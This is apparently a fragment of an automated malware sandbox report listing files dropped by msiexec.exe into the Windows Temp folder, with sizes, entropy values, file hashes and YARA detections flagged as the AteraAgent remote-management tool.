                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF14B7E2773E7C33C4.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2309993325116284
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3VUuKNveFXJ5T5CDyqISoedGPdGTWaStedGPdGTn:lU8hTkDHIOD
                                                                                                                                                                                                                                                                                              MD5:FCF8BEAA29D6285CFF2000F44F4B5972
                                                                                                                                                                                                                                                                                              SHA1:E80DDE73FF4C29E48F5AF474C1479F4C0AD9346D
                                                                                                                                                                                                                                                                                              SHA-256:81E2E2373C75874284C496257AFDEDE5F9FFD13077B1BA8181110017F962093C
                                                                                                                                                                                                                                                                                              SHA-512:DCF47F5317C3EF5536F31770F2A769157F01190CD30C776C372A6CE8DE13917AE782AB42E681DF3716E3136790B0C33D6E204ECFA2B855530366DB0C5CBF5B4A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF18C3B2AA98B412A3.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0006922475342237
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:DMMXukNveFXJ5T5p4DKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:tXehTn4DvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:46CE44BED22189CF1AB2CF61EED86FE2
                                                                                                                                                                                                                                                                                              SHA1:51F6D0431C65B24E1FDAD9F41DA11E267A3D63E9
                                                                                                                                                                                                                                                                                              SHA-256:380BA4720745AC4D45211A415B36E693D73B5266A43399D0D837F9C0C06043BA
                                                                                                                                                                                                                                                                                              SHA-512:4368A1653BE8A0A5894A3CED2FBF165C7335D784C04D706834A18ED814A9998C072495900FC8D4558AD303A41C6F349943DB84A7F24A7C60FD34E05B223FF6F8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF2C154A89BDA544DA.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2567140222927486
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:0gduksPveFXJhT5SFgWbkqISoedGPdGfoOdrzST1StedGPdGRub1n:9dr5TlchI4QT1ox
                                                                                                                                                                                                                                                                                              MD5:A30478549D793290405A8B0126F7C0C0
                                                                                                                                                                                                                                                                                              SHA1:A2435F6FD86F749B92BF2C41A966B2C036DBED70
                                                                                                                                                                                                                                                                                              SHA-256:AE2C0DF62B1CB042E660217586918E98DD0756DC50227E68F0308CAD95C6A331
                                                                                                                                                                                                                                                                                              SHA-512:6DCFE8EE240DE0FB2490AA86307F230F44BACC6FFF73DCF00C80E3FF3822A29479D86316F684B05A259765B8B9551495D49605C65B5889345E0B3C76C86E9A1F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF4ABAF93AAD4B12FE.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):69632
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.1448758646822639
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:CnVubmStedGPdGeqISoedGPdGfoOdrzSTaMFgW:icyLI4QTaR
                                                                                                                                                                                                                                                                                              MD5:6444934467F9AEB55FFFBEBB209521A5
                                                                                                                                                                                                                                                                                              SHA1:C746AAEDA480F952B7F43AA9FB3AC23020CA1B2C
                                                                                                                                                                                                                                                                                              SHA-256:797FD172529788CA0F521BEC4BEB953C98576BB02CE5549A988AB4BDD445BADD
                                                                                                                                                                                                                                                                                              SHA-512:6E6A378AB34727FBA5D71B5F1EC51E50DC885E399DB3972CBFA7613AE9B32A27B7775CB3A14E4246E9A72EECF924B1086E329A3CB62F9675F76C0F11D82BB1D8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF59C1AFBE99E78D01.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):69632
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.13063740619553163
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:CnAipVfedGSadGS7qIipVGedGSadGSfEqasJGPWTZkJPw+c+nljQ:CnAStedGPdGeqISoedGPdGTWnj
                                                                                                                                                                                                                                                                                              MD5:043C0130DCD01C7BF7EEDD8AEE5FDDBB
                                                                                                                                                                                                                                                                                              SHA1:ED6E4F94098FE0E44DA6892DB327E5CA4C24E0F7
                                                                                                                                                                                                                                                                                              SHA-256:DE2CCA788A158B2883F3D453E2E4E751F3503170F33810F2AF3D7834801F7BB0
                                                                                                                                                                                                                                                                                              SHA-512:CDB7585748B9FD8587520F93605C06AEE18C1B4D22F28F75037CDBED01D96066C90B5B2916C74583075C0B18B7F4164A5CD5B5BFDB252CFBDB0DCA389618E286
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF66386BAAA34E81A4.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2219215672728465
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:V8PhcuRc06WXJEFT5+DyqISoedGPdGTWaStedGPdGTn:4hc1HFTgDHIOD
                                                                                                                                                                                                                                                                                              MD5:8B9681627CED571797950FE00B9F9D66
                                                                                                                                                                                                                                                                                              SHA1:5300FAAD48805CF2B4E55B9A66961E843802B7B8
                                                                                                                                                                                                                                                                                              SHA-256:90AECFBFFBE468F9A56DDAA317C78EE698E73E4AC616445389D54D1E877C366D
                                                                                                                                                                                                                                                                                              SHA-512:9429DC91CCE304D60F6D59E785C0F76AA027EA08CE3A988940C6C29FC5B59B0E9F21F37CF4A4CB94B5C9B94C3418116D21344369888F4CE9DDB3D5A8C24E8B87
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF767FEA75492F0964.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0006922475342237
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:DMMXukNveFXJ5T5p4DKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:tXehTn4DvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:46CE44BED22189CF1AB2CF61EED86FE2
                                                                                                                                                                                                                                                                                              SHA1:51F6D0431C65B24E1FDAD9F41DA11E267A3D63E9
                                                                                                                                                                                                                                                                                              SHA-256:380BA4720745AC4D45211A415B36E693D73B5266A43399D0D837F9C0C06043BA
                                                                                                                                                                                                                                                                                              SHA-512:4368A1653BE8A0A5894A3CED2FBF165C7335D784C04D706834A18ED814A9998C072495900FC8D4558AD303A41C6F349943DB84A7F24A7C60FD34E05B223FF6F8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF884CE156ACD16DC3.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):69632
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.16351377624463714
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:TEubmStedvPdv+qISoedvPdvbCnuhnq9Onq9BGw0:hybIciuBuO40
                                                                                                                                                                                                                                                                                              MD5:95F6BB4730F538ECBFDD8B6FCB68ED1E
                                                                                                                                                                                                                                                                                              SHA1:5F1EF9A8E93E003855700931B956F85A6546DACF
                                                                                                                                                                                                                                                                                              SHA-256:7E54DB7E9C01ED9CE12052FC5CD3C7DB2B934BEFB58E5D69A03B3C6BAF94E203
                                                                                                                                                                                                                                                                                              SHA-512:B9AA96F27438117C658B111FD42506B897B897BDF473D271CB400852073FC2D89A500C79886A34D0089F9B7220A01C20F7B39DD3F9C4EAA39CA8ADD778B86A4D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF9A4574B4F262FBE9.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2309993325116284
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3VUuKNveFXJ5T5CDyqISoedGPdGTWaStedGPdGTn:lU8hTkDHIOD
                                                                                                                                                                                                                                                                                              MD5:FCF8BEAA29D6285CFF2000F44F4B5972
                                                                                                                                                                                                                                                                                              SHA1:E80DDE73FF4C29E48F5AF474C1479F4C0AD9346D
                                                                                                                                                                                                                                                                                              SHA-256:81E2E2373C75874284C496257AFDEDE5F9FFD13077B1BA8181110017F962093C
                                                                                                                                                                                                                                                                                              SHA-512:DCF47F5317C3EF5536F31770F2A769157F01190CD30C776C372A6CE8DE13917AE782AB42E681DF3716E3136790B0C33D6E204ECFA2B855530366DB0C5CBF5B4A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF9CDD7DFF0A80F0FA.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2219215672728465
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:V8PhcuRc06WXJEFT5+DyqISoedGPdGTWaStedGPdGTn:4hc1HFTgDHIOD
                                                                                                                                                                                                                                                                                              MD5:8B9681627CED571797950FE00B9F9D66
                                                                                                                                                                                                                                                                                              SHA1:5300FAAD48805CF2B4E55B9A66961E843802B7B8
                                                                                                                                                                                                                                                                                              SHA-256:90AECFBFFBE468F9A56DDAA317C78EE698E73E4AC616445389D54D1E877C366D
                                                                                                                                                                                                                                                                                              SHA-512:9429DC91CCE304D60F6D59E785C0F76AA027EA08CE3A988940C6C29FC5B59B0E9F21F37CF4A4CB94B5C9B94C3418116D21344369888F4CE9DDB3D5A8C24E8B87
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB27147300DD38853.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2567140222927486
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:0gduksPveFXJhT5SFgWbkqISoedGPdGfoOdrzST1StedGPdGRub1n:9dr5TlchI4QT1ox
                                                                                                                                                                                                                                                                                              MD5:A30478549D793290405A8B0126F7C0C0
                                                                                                                                                                                                                                                                                              SHA1:A2435F6FD86F749B92BF2C41A966B2C036DBED70
                                                                                                                                                                                                                                                                                              SHA-256:AE2C0DF62B1CB042E660217586918E98DD0756DC50227E68F0308CAD95C6A331
                                                                                                                                                                                                                                                                                              SHA-512:6DCFE8EE240DE0FB2490AA86307F230F44BACC6FFF73DCF00C80E3FF3822A29479D86316F684B05A259765B8B9551495D49605C65B5889345E0B3C76C86E9A1F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB6CCB0CC037A0B87.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.077966497703753
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO1LtCmOuPrfkiVky6l51:2F0i8n0itFzDHFzTPrfWr
                                                                                                                                                                                                                                                                                              MD5:785EA75A2FB1DB6D9155B28A1291DAF3
                                                                                                                                                                                                                                                                                              SHA1:6B86F7E077D0A8823383FBB776313FEDB17BFDEA
                                                                                                                                                                                                                                                                                              SHA-256:BCD727E77C067BD5A31C13E8024F00ED60381D9AB725CAE2E6777A5708C9DDE0
                                                                                                                                                                                                                                                                                              SHA-512:1834BBF627951711C96708EE7AA4B6C069055E832C717561DC77592E68EFB93E65FE825A5D3D13859057C93BE96CC12701D725491C4CFC49A4EE4FD40942E72A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.07946708191272502
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOFXjjFZjsTJyv+S1wVky6la:2F0i8n0itFzDHFJQTI+SRa
                                                                                                                                                                                                                                                                                              MD5:A652CABF526AB5C6A007E73B400C40CA
                                                                                                                                                                                                                                                                                              SHA1:3CCB8EDF672257D6474886654C2AB7961CBF2705
                                                                                                                                                                                                                                                                                              SHA-256:E8D664E3F40BB6E21A6658591B6FCEEDA306EE39F15438402B2A10BED46499EE
                                                                                                                                                                                                                                                                                              SHA-512:5139E5D23EAF5B4EC4EDC904EF9CA3CB06DB7EA532044A03A93343B4C3A509F8D13895739262F54FEAB559190F1024F379BBC0473F9C4ACA6A4B7C1EB7555150
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0006922475342237
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:DMMXukNveFXJ5T5p4DKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:tXehTn4DvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:46CE44BED22189CF1AB2CF61EED86FE2
                                                                                                                                                                                                                                                                                              SHA1:51F6D0431C65B24E1FDAD9F41DA11E267A3D63E9
                                                                                                                                                                                                                                                                                              SHA-256:380BA4720745AC4D45211A415B36E693D73B5266A43399D0D837F9C0C06043BA
                                                                                                                                                                                                                                                                                              SHA-512:4368A1653BE8A0A5894A3CED2FBF165C7335D784C04D706834A18ED814A9998C072495900FC8D4558AD303A41C6F349943DB84A7F24A7C60FD34E05B223FF6F8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFD7C2903EF9D68D12.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.5701520453577955
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:sp8PhluRc06WXJsFT5SFgWbkqISoedGPdGfoOdrzST1StedGPdGRub1n:skhl1PFTlchI4QT1ox
                                                                                                                                                                                                                                                                                              MD5:E4BF5E06B9C0886D6CBFC3D68E095B0E
                                                                                                                                                                                                                                                                                              SHA1:7437D28CE9985FC0554FDFF9F991BDD1AD5C5BBA
                                                                                                                                                                                                                                                                                              SHA-256:0F5C40FDF1AEF16B0EC5FC509BB7567705A855ADFB45EAB045B649DD6242A38A
                                                                                                                                                                                                                                                                                              SHA-512:5E9F5B4701A1174A020BB6CB8D653DA54E63E4B474B074A691CC726AD1C4F8B6E296640F4CD9CE6E51CD48E4F83EDA499C1F8B1B9106F5563438F8E35C1D106F
